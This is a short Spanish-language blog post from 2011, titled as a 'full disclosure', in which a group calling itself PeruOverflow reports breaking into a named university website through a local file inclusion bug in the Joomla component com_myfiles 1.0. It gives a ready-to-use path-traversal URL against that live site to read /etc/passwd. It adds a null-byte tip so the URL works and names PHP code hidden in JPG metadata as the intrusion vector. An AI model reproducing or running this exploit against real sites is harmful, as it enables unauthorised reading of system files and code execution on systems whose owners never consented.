sábado, 30 de julio de 2011

Full Disclosure: Vulnerabilidad en CSL UNACINUX

DATOS SOBRE EL BUG

Joomla Component My Files Local File Inclusion Vulnerability
Software : com_myfiles version 1.0
Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact  : public[at]antisecurity[dot]org
Home     : http://antisecurity.org/

DATOS SOBRE LA EXPLOTACION

Target:  csl.unac.edu.pe
Autor : PeruOverflow [ Neotrons  Reverse Null ]
Vector de intrusión: Inclusión de codigo php en Metadatos de la cabecera jpg
Title: Tux of Death
Identificación del Bug:
(No dejar espacio entre el % y el 00 yo lo coloco así porque en blogger no lo reconoce junto. Debe ser junto para que se pueda ver el BUG )
http://csl.unac.edu.pe/index.php?option=com_myfiles&controller=../../../../../../../../../../etc/passwd% 00

Grado de Impacto: Medio/Alto



Publicado por PERUoverflow en 20:26 0 comentarios
Suscribirse a: Entradas (Atom)